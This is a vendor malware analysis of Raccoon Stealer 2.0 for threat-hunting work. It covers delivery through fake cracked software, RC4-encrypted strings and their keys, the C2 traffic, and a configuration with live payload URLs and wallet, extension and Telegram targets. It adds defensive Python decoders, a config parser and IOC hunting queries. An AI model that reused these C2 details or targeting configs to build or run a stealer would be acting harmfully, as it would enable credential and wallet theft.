FortiEDR
FortiEDR automates the protection against advanced threats, pre and post-execution, with real time orchestrated incident response functionality.
agat (Staff)
Article Id 222723

Introduction

Raccoon Stealer is an information-stealing trojan distributed under a Malware-as-a-Service (MaaS) model for $75/week or $200/month. Once a threat actor has purchased access they are given an admin panel, which lets them customize the malware, retrieve logs stolen by their deployments of the tool and create new builds of the malware. The service has been sold on underground forums since early 2019. The stealer suddenly paused operations in March 2022, reportedly (unverified) because a developer was lost in the Russian conflict in Ukraine. Before this pause, a user profile related to the Raccoon Stealer service (username: raccoonstealer) stated on the Russian-language cybercrime forum ‘Exploit’, “Don’t say goodbye forever” and that “they are working on second version”.

Since this operational pause, the FortiGuard Threat Research team identified a new post from ‘racconstealer’ on the ‘Exploit’ forum advertising a credential stealer named 'Raccoon Stealer 2.0', an updated version of the original Raccoon Stealer. The user mentions having set up a beta version of the stealer, which has received positive responses from regular clientele on the forum.

 


Figure 1. Raccoon Stealer 2.0 underground forum post outlining details of the malware. The post is in Russian (Cyrillic); a translated summary of its contents follows below.

 

The new version of Raccoon Stealer appears to have been rewritten from scratch, retaining the old features while updating the appearance and functionality of the admin dashboard. According to the developer, this has reduced the size of the build and made the logs more informative. The following features were said to be present in the new version of the malware (translated from the original post shown above):

  • The build has been rewritten in C++ and now sends the collected logs dynamically in divided parts, reducing the risk of losing the information if the build is flagged by antivirus
  • Smaller build size of 55 kB, as opposed to the previously hefty 580 kB build
  • Common proxies have been replaced, reducing the lag in dynamic transmission of the log files
  • Users can patch the build with up to 5 unique IP addresses and can monitor them from the admin panel
  • Logs can be sent directly to one's Telegram account via the new Telegram bot
  • Build now supports collecting data from almost all browsers
  • The decryption of passwords and cookies is now performed on the server-side
  • Addresses on crypto wallets such as Coinbase, MetaMask, Brave, and Ronin, are now recognized automatically, with Phantom browser to follow suit.
  • SSL support added
  • Modern and minimal style
  • Flexibility in the search system
  • Mass deletion from the dashboard itself
  • News and Comments sections added
  • Frequently Asked Questions (FAQ) section
  • A statistical representation of logs
  • The actor has quoted a price of $150 USD per week, $275 USD per month, and an additional $50 USD for a unique build with an additional tag.


Figure 2. Raccoon Stealer v2.0 Admin dashboard acquired by FortiRecon researchers.

 

The screenshots and darknet post details above are excerpts from a report on Raccoon V2 produced by the FortiRecon team. FortiRecon subscribers can access the detailed Threat Intelligence report at https://fortirecon.forticloud.com/adversary-centric-intelligence/reports?reportId=2022070435322

 

Understanding a Raccoon Stealer Intrusion

When the Raccoon Stealer malicious file is executed by the targeted user, the created process communicates with its command and control (C2) server and attempts to download additional DLL files required to support the stealer's functions. The attack diagram for this whole process is shown in Figure 3 below. To demonstrate FortiEDR's ability to detect post-execution behavior, we executed the sample in a test environment with FortiEDR in log-only mode. In protect mode, FortiEDR blocks all activity that results in the creation of a security event.

 


Figure 3. Raccoon V2 attack diagram.

 

The most common distribution method observed by the FortiGuard Responder team is fake websites offering cracked software. This differs from the more common phishing-based delivery we see with other stealers such as Agent Tesla and RedLine. One such sample is still being served through an active fake website and was retrieved and analyzed as part of this article. Every software download link on this website redirects to a <7 alphanumeric characters>.cfd link, which in turn provides a MediaFire link to the final RAR file. All the RAR files follow the naming pattern PA$$w0rds_1234__MainFiles<1 number>—<2 alphanumeric>.rar

 


Figure 4. Download steps on the fake cracked-software site that result in a Raccoon Stealer payload.

 

The downloaded RAR file is password protected and contains two files: a text file named “PA$$W0RDz is ==  1234.txt” and an executable named “SetupsCracked1.exe”. The same archive is downloaded whichever cracked-software link on the website the user clicks. When the enclosed executable is run, FortiEDR detects and mitigates the attempted execution. This event is detected by the “Suspicious File Detected” rule within the ‘Execution Prevention’ security policy. An example of one of these generated security events is shown in Figure 5 below.


Figure 5. FortiEDR Execution Prevention policy event related to user execution of Raccoon V2.

 

FortiEDR also detects and mitigates the sample's attempts to communicate with its C2. This block triggers two rules, “PUP - Potentially Unwanted Program” and “Suspicious Packer”, both under the Exfiltration Prevention policy. The event generated during our analysis is shown in Figure 6 below.


Figure 6. Raccoon V2 C2 connection blocked.

 

The main Raccoon Stealer executable contains a number of strings that are stored encrypted in the file on disk and decrypted at runtime. The strings are base64 encoded and then encrypted with the RC4 algorithm. The RC4 key is stored in the executable itself; in this sample the key was “edinayarossiya”. A blog by ZeroFox Intelligence on Raccoon Stealer notes that Edinaya Rossiya translates to “United Russia”, currently the largest political party in Russia.[1]

The C2 IP address is also hardcoded into the executable in the same encrypted form, but with a separate key, which in our case was “403f7b121a3afd9e8d27f945140b8a92”. This can be observed in Figure 7, taken while the file was run under a debugger for analysis.

 


Figure 7. C2 IP runtime decryption observed while debugging the executable with x32dbg[2].
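To make the string-protection scheme described above concrete, here is an added Python example (my own code, not from the article, Fortinet or the malware) that implements RC4 and reverses the base64 + RC4 layering using the keys quoted in the article. The article's wording leaves the order of the two steps ambiguous, so decode_string tries both orders and keeps whichever yields printable text; the blobs it is given are constructed here by encode_string, not extracted from the sample.

```python
import base64
import binascii
from typing import Optional

# Keys quoted in the article for the analyzed sample
STRING_KEY = b"edinayarossiya"
C2_KEY = b"403f7b121a3afd9e8d27f945140b8a92"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation, XORed into data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _as_text(raw: bytes) -> Optional[str]:
    """Return the bytes as a string only if they decode to printable UTF-8 text."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def decode_string(blob: bytes, key: bytes) -> Optional[str]:
    """Undo base64 + RC4 in either order; return the first result that is printable text.

    Order A follows the article's wording literally (plaintext -> base64 -> RC4).
    Order B is the other possibility (plaintext -> RC4 -> base64). Which one a given
    sample uses is an assumption the analyst has to confirm in the debugger.
    """
    candidates = []
    try:
        candidates.append(base64.b64decode(rc4(key, blob), validate=True))   # order A
    except (binascii.Error, ValueError):
        pass
    try:
        candidates.append(rc4(key, base64.b64decode(blob, validate=True)))   # order B
    except (binascii.Error, ValueError):
        pass
    for candidate in candidates:
        text = _as_text(candidate)
        if text:
            return text
    return None


def encode_string(plain: str, key: bytes) -> bytes:
    """Build a blob in order A; used only to construct test data for decode_string."""
    return rc4(key, base64.b64encode(plain.encode("utf-8")))


if __name__ == "__main__":
    # Constructed sample: the C2 download URL from the article's config, protected with the string key
    sample = encode_string("http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll", STRING_KEY)
    print(decode_string(sample, STRING_KEY))
```

When triaging a real sample, the blobs come from the binary's data section (or from a memory dump taken at the point shown in Figure 7) and both keys are candidates; an entry that decodes under C2_KEY but not STRING_KEY is the kind of thing the C2 address would look like.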

 

The malware generates a unique machine ID for the infected host and sends it, together with the username and the hardcoded encryption key (in the ‘configId’ field), as parameters when connecting to the C2 server. The machine ID is unique per infected host and does not change even if the malware is executed multiple times on the same host. The C2 IP address in the sample is encrypted with this same key. The malware sends this data in an HTTP POST request like the example shown in Figure 8 below.

 


Figure 8. HTTP POST request made to the Raccoon C2.

 

The C2 server then responds with the configuration for the sample. The configuration uses a custom plain-text format in which each entry takes the form {Field-category}_{Field-name}:{Field-value}. Examples of each type of entry are shown in Table 1 below.

Each config component is listed below, followed by its description.

libs_nss3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
    Firefox DLL library file name and URL for download

sstmnfo_System Info.txt:System Information:
    Collect system information

|Installed applications:|
    Get list of installed applications

libs_nssdbm3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll
    Firefox DLL library file name and URL for download

wlts_daedalus:Daedalus;26;Daedalus Mainnet;*;log*,*cache,chain,dictionar*
    Collect data from the Daedalus wallet software

ews_metax:mcohilncbfahbmgdjkbpemcciiolgcge;MetaX;Local Extension Settings
    Collect data from the MetaX browser extension

scrnsht_Screenshot.jpeg:1
    Take a screenshot of the computer and send it as a JPEG file

tlgrm_Telegram:Telegram Desktop\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*
    Collect data from the Telegram chat software

token:37c8b713348e32d66115267ac943a7b6
    Page address used for exfiltration

Table 1. C2 configuration explanations.
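As an added example (my own code, not from the article or from Fortinet), here is a small Python parser for the {Field-category}_{Field-name}:{Field-value} format described above, run over the Table 1 entries as constructed input. It splits each entry into its parts and then pulls out the pieces a defender wants first: the download URLs to block, the wallet and extension identifiers being targeted, and the exfiltration token. The helper names are mine; treating the |Installed applications:| line as an unkeyed raw entry is an assumption, since the article does not say how that line is delimited.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Entry pattern stated in the article: {Field-category}_{Field-name}:{Field-value}
KEYED_RE = re.compile(r"^([A-Za-z0-9]+)_([^:]*):(.*)$")
# Entries with no name part, e.g. token:<hex>
BARE_RE = re.compile(r"^([A-Za-z0-9]+):(.*)$")


@dataclass
class ConfigEntry:
    category: Optional[str]   # None for lines that do not follow the pattern
    name: str
    value: str

    def fields(self) -> List[str]:
        # Wallet and extension entries pack sub-fields separated by ';'
        return self.value.split(";")


def parse_config(text: str) -> List[ConfigEntry]:
    """Parse one C2 configuration response into entries, one per non-empty line."""
    entries: List[ConfigEntry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = KEYED_RE.match(line)
        if m:
            entries.append(ConfigEntry(m.group(1), m.group(2), m.group(3)))
            continue
        m = BARE_RE.match(line)
        if m:
            entries.append(ConfigEntry(m.group(1), "", m.group(2)))
            continue
        entries.append(ConfigEntry(None, "", line))   # assumption: keep unknown lines verbatim
    return entries


def download_urls(entries: List[ConfigEntry]) -> List[str]:
    """URLs of the support DLLs the stealer will fetch (libs_* entries)."""
    return [e.value for e in entries if e.category == "libs"]


def wallet_names(entries: List[ConfigEntry]) -> List[str]:
    return [e.fields()[0] for e in entries if e.category == "wlts"]


def extension_ids(entries: List[ConfigEntry]) -> List[str]:
    """Browser extension IDs targeted by ews_* entries (first ';' field)."""
    return [e.fields()[0] for e in entries if e.category == "ews"]


def token(entries: List[ConfigEntry]) -> Optional[str]:
    for e in entries:
        if e.category == "token":
            return e.value
    return None


def categories(entries: List[ConfigEntry]) -> Dict[str, int]:
    """How many entries of each category the config carries."""
    return dict(Counter(e.category for e in entries if e.category))


# Constructed input: the Table 1 entries, one per line, as the C2 would send them
SAMPLE_CONFIG = r"""
libs_nss3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
sstmnfo_System Info.txt:System Information:
|Installed applications:|
libs_nssdbm3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll
wlts_daedalus:Daedalus;26;Daedalus Mainnet;*;log*,*cache,chain,dictionar*
ews_metax:mcohilncbfahbmgdjkbpemcciiolgcge;MetaX;Local Extension Settings
scrnsht_Screenshot.jpeg:1
tlgrm_Telegram:Telegram Desktop\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*
token:37c8b713348e32d66115267ac943a7b6
"""

if __name__ == "__main__":
    parsed = parse_config(SAMPLE_CONFIG)
    for url in download_urls(parsed):
        print("block:", url)
    print("wallets:", wallet_names(parsed), "extensions:", extension_ids(parsed))
    print("token:", token(parsed), "categories:", categories(parsed))
```

The same parser works on a configuration captured from network traffic (the plain-text response to the POST in Figure 8), which is where the download URLs and token for a new build are most easily collected.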

 

The malware downloads the DLL files specified in the configuration data provided by the C2. In the case of our sample, the following DLL files were downloaded:

 

DLL File           Download Path                      Description
nss3.dll           %USERPROFILE%\AppData\LocalLow\    Firefox DLL library file
msvcp140.dll       %USERPROFILE%\AppData\LocalLow\    Microsoft C DLL file
vcruntime140.dll   %USERPROFILE%\AppData\LocalLow\    Microsoft VC++ runtime DLL file
mozglue.dll        %USERPROFILE%\AppData\LocalLow\    Firefox DLL library file
freebl3.dll        %USERPROFILE%\AppData\LocalLow\    Firefox DLL library file
softokn3.dll       %USERPROFILE%\AppData\LocalLow\    NSS PKCS library DLL file
sqlite3.dll        %USERPROFILE%\AppData\LocalLow\    DLL library for the SQLite database

Table 2. Download paths and descriptions of the DLL files downloaded by the malware.

 

These files are third-party DLLs from various software packages. All of them are reported clean by every antivirus engine on VirusTotal.

 

After downloading these files, the malware sends system information and the list of installed applications to the C2 in the format shown in Figure 9 below. It then sends the web browser cookies to the C2.


Figure 9. System information sent to the C2 as stealer communication.

 

After sending the system information and cookies, the malware takes a screenshot of the infected machine and sends it to the C2 server; this corresponds to the scrnsht_Screenshot.jpeg field in the config data. The screenshot is sent with the filename “---Screenshot.jpeg”. The JPEG file is never written to disk; it exists only in memory.

 

Conclusion

In this article we analyzed a Raccoon V2 sample and observed how FortiEDR detects the malicious sample and blocks its communication with the C2 server.

 

Threat Hunting

 

Execution of the analyzed Raccoon Stealer samples can be detected using the following Threat Hunting query. It identifies 'Process Creation' events whose target file SHA1 matches one of the known Raccoon Stealer hashes listed in the IOC section. This query will only detect the analyzed samples; future variants will have different hashes:

 

Type:"Process Creation" AND Target.Process.File.SHA1:("b4cf85691dcc7c6e2d709b292056d404e7fb58f0" OR "19d9fbfd9b23d4bd435746a524443f1a962d42fa" OR "7cead6f1e4c4b0824365268cdd5d168acf56265c" OR "19d9fbfd9b23d4bd435746a524443f1a962d42fa")


Network connections to the known Raccoon Stealer C2 servers can be found using the following Threat Hunting query, which finds “Socket Connect” events whose remote IP address matches a known C2. These C2 servers are associated with the analyzed samples, so the query will not detect communication with future C2 servers:

 

Type:"Socket Connect" AND RemoteIP: (2.58.56.247 OR 51.195.166.184)


The HTTP requests made by the malware to its C2 can be found with the following Threat Hunting query. Again, this C2 server is associated with the analyzed samples and the query would not detect future C2 servers:

 

Type:"HTTP Request" AND URL:"http://2.58.56.247:80"


The malware downloads DLL files to support its modules; the file creation events generated by these downloads can be found in the threat hunting data with the following query. It matches “File Create” events where the file path contains the LocalLow folder and the created file is one of the DLLs downloaded by Raccoon Stealer:

 

Type:"File Create" AND Target.File.Path:(\\AppData\\LocalLow) AND Target.File.Name:(nss3.dll OR msvcp140.dll OR vcruntime140.dll OR mozglue.dll OR freebl3.dll OR softokn3.dll OR sqlite3.dll OR nssdbm3.dll)


The most prominent distribution of Raccoon V2 is the download of a fake cracked setup in RAR format. We can search the network for similar malicious file download events. A browser download sometimes creates the file with a “.partial” extension and renames it once the download completes. To catch both cases, the following query looks for “File Create” or “File Rename” events with the specific filename pattern used by the Raccoon Stealer distribution website:

 

(Type:"File Create" AND PA$$w0rds_1234__* AND Target.File.Ext:"rar") OR (Type:"File Rename" AND Target.File.Ext:"partial" AND PA$$w0rds_1234__*)
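The five Threat Hunting queries above, and the DLL drop locations in Table 2, express one detection logic; as an added example (my own code, not from the article or from FortiEDR) here is that logic in Python, run over constructed event records. The records are plain dictionaries whose keys mirror the field names used in the queries (Type, Target.Process.File.SHA1, RemoteIP, URL, Target.File.Path, Target.File.Name, Target.File.Ext); that shape, the hit labels and the sample events are my assumptions, not a FortiEDR export format. The indicators themselves (hashes, IPs, DLL names, archive name pattern) are the ones given in the article.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

# Indicators from the article
KNOWN_SHA1 = {
    "b4cf85691dcc7c6e2d709b292056d404e7fb58f0",
    "19d9fbfd9b23d4bd435746a524443f1a962d42fa",
    "7cead6f1e4c4b0824365268cdd5d168acf56265c",
}
KNOWN_C2 = {"2.58.56.247", "51.195.166.184"}
C2_HTTP_PREFIX = "http://2.58.56.247:80"
DROPPED_DLLS = {"nss3.dll", "msvcp140.dll", "vcruntime140.dll", "mozglue.dll",
                "freebl3.dll", "softokn3.dll", "sqlite3.dll", "nssdbm3.dll"}
# Archive naming pattern from the distribution site, for both the final .rar and the
# browser's in-progress .partial file
RAR_NAME = re.compile(r"^PA\$\$w0rds_1234__.*\.(rar|partial)$", re.IGNORECASE)

Event = Dict[str, str]


def match_event(ev: Event) -> List[str]:
    """Return the labels of every hunting rule the event satisfies (usually zero or one)."""
    hits: List[str] = []
    etype = ev.get("Type", "")
    name = ev.get("Target.File.Name", "")
    path = ev.get("Target.File.Path", "")
    if etype == "Process Creation" and ev.get("Target.Process.File.SHA1", "").lower() in KNOWN_SHA1:
        hits.append("known-sample-execution")
    if etype == "Socket Connect" and ev.get("RemoteIP") in KNOWN_C2:
        hits.append("c2-socket-connect")
    if etype == "HTTP Request" and ev.get("URL", "").startswith(C2_HTTP_PREFIX):
        hits.append("c2-http-request")
    if etype == "File Create" and r"\appdata\locallow" in path.lower() and name.lower() in DROPPED_DLLS:
        hits.append("dropped-dll")
    if etype in ("File Create", "File Rename") and RAR_NAME.match(name):
        hits.append("fake-crack-archive")
    return hits


def hunt(events: List[Event]) -> List[Tuple[int, str]]:
    """(event index, label) for every hit, in event order."""
    return [(i, label) for i, ev in enumerate(events) for label in match_event(ev)]


def summarize(events: List[Event]) -> Dict[str, int]:
    return dict(Counter(label for _, label in hunt(events)))


# Constructed sample events: five that should fire, two that should not
SAMPLE_EVENTS: List[Event] = [
    {"Type": "Process Creation", "Target.Process.File.Name": "SetupsCracked1.exe",
     "Target.Process.File.SHA1": "B4CF85691DCC7C6E2D709B292056D404E7FB58F0"},
    {"Type": "Socket Connect", "RemoteIP": "2.58.56.247", "RemotePort": "80"},
    {"Type": "HTTP Request", "URL": "http://2.58.56.247:80/"},
    {"Type": "File Create", "Target.File.Path": r"C:\Users\alice\AppData\LocalLow",
     "Target.File.Name": "nss3.dll", "Target.File.Ext": "dll"},
    {"Type": "File Rename", "Target.File.Path": r"C:\Users\alice\Downloads",
     "Target.File.Name": "PA$$w0rds_1234__MainFiles1--ab.rar.partial", "Target.File.Ext": "partial"},
    {"Type": "File Create", "Target.File.Path": r"C:\Users\alice\Downloads",
     "Target.File.Name": "PA$$w0rds_1234__MainFiles3--xy.rar", "Target.File.Ext": "rar"},
    {"Type": "Process Creation", "Target.Process.File.Name": "notepad.exe",
     "Target.Process.File.SHA1": "0000000000000000000000000000000000000000"},   # constructed benign hash
    {"Type": "File Create", "Target.File.Path": r"C:\Users\alice\AppData\LocalLow",
     "Target.File.Name": "readme.txt", "Target.File.Ext": "txt"},
]

if __name__ == "__main__":
    for index, label in hunt(SAMPLE_EVENTS):
        print(index, label, SAMPLE_EVENTS[index].get("Type"))
    print(summarize(SAMPLE_EVENTS))
```

The hash comparison is case-insensitive and the DLL rule requires both the LocalLow path and a name from Table 2, so a legitimate copy of sqlite3.dll elsewhere on disk does not fire; as the article notes, the hash and C2 rules only cover the analyzed samples, while the DLL-drop and archive-name rules describe behaviour and have a better chance of surviving a rebuild.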


MITRE ATT&CK

 

Technique ID   Technique Description            Observed Activity

TA0005 - Defense Evasion
T1036          Masquerading                     Creates files inside the user directory

TA0006 - Credential Access
T1003          OS Credential Dumping            Tries to harvest and steal browser information (history, passwords, etc.)

TA0007 - Discovery
T1082          System Information Discovery     1) Queries the cryptographic machine GUID; 2) Reads software policies
T1083          File and Directory Discovery     Enumerates the file system

TA0009 - Collection
T1005          Data from Local System           1) Tries to harvest and steal browser information (history, passwords, etc.); 2) Tries to steal cryptocurrency wallets

TA0011 - Command and Control
T1071          Application Layer Protocol       1) Downloads executable code via HTTP; 2) Downloads files from webservers via HTTP; 3) Posts data to webserver
T1095          Non-Application Layer Protocol   1) Downloads files from webservers via HTTP; 2) Posts data to webserver
T1105          Ingress Tool Transfer            1) Downloads executable code via HTTP; 2) Downloads files from webservers via HTTP


IOCs (Indicators Of Compromise)

 

Indicator: 2.58.56[.]247
  Indicator Type: IP Address (C2 IP)
  Associated Tactic: Command and Control
  Notes: This C2 IP was contacted by Raccoon Stealer following execution of the main payload.
  First Observed: 2022-06-30

Indicator: 51.195.166[.]184
  Indicator Type: IP Address (C2 IP)
  Associated Tactic: Command and Control
  Notes: This C2 IP was contacted by Raccoon Stealer following execution of the main payload.
  First Observed: 2022-07-01

Indicator: b4cf85691dcc7c6e2d709b292056d404e7fb58f0
  Indicator Type: SHA1 Hash
  Associated Tactic: Execution, Command and Control
  Notes: Raccoon Stealer main executable file hash
  First Observed: 2022-06-14

Indicator: 19d9fbfd9b23d4bd435746a524443f1a962d42fa
  Indicator Type: SHA1 Hash
  Associated Tactic: Execution, Command and Control
  Notes: Raccoon Stealer main executable file hash
  First Observed: 2022-06-22

Indicator: 7cead6f1e4c4b0824365268cdd5d168acf56265c
  Indicator Type: SHA1 Hash
  Associated Tactic: Execution, Command and Control
  Notes: Raccoon Stealer sample with similar behavior, connecting to the same C2
  First Observed: 2022-06-30

Indicator: 19d9fbfd9b23d4bd435746a524443f1a962d42fa
  Indicator Type: SHA1 Hash
  Associated Tactic: Execution, Command and Control
  Notes: Raccoon Stealer sample with similar behavior, connecting to the same C2
  First Observed: 2022-06-30


[1] https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/

 

[2] https://x64dbg.com/
